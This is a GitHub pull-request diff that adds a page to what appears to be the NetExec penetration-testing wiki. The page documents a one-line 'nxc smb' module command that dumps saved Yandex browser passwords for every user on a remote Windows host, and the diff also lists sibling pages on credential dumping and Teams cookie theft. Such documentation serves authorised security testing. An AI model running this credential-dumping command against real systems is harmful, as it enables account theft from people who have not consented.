Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions SUMMARY.md
Original file line number Diff line number Diff line change
Expand Up @@ -85,6 +85,7 @@
* [🆕 Dump Notepad++](smb-protocol/obtaining-credentials/dump-notepad++.md)
* [🆕 Dump Remote Desktop Credential Manager](smb-protocol/obtaining-credentials/dump-rdcman.md)
* [🆕 Dump Event Log Creds(4688)](smb-protocol/obtaining-credentials/eventlog-creds.md)
* [🆕 Dump Yandex Credentials](smb-protocol/obtaining-credentials/dump-yandex-creds.md)
* [Defeating LAPS](smb-protocol/defeating-laps.md)
* [Checking for Spooler & WebDav](smb-protocol/spooler-webdav-running.md)
* [Steal Microsoft Teams Cookies](smb-protocol/steal-microsoft-teams-cookies.md)
Expand Down
11 changes: 11 additions & 0 deletions smb-protocol/obtaining-credentials/dump-yandex-creds.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
# Dump Yandex Browser Credentials

Extract all saved passwords from the Yandex browser for every user on the system.

{% hint style="warning" %}
You need at least local admin privilege on the remote target
{% endhint %}

```bash
nxc smb <ip> -u user -p pass -M yandex
```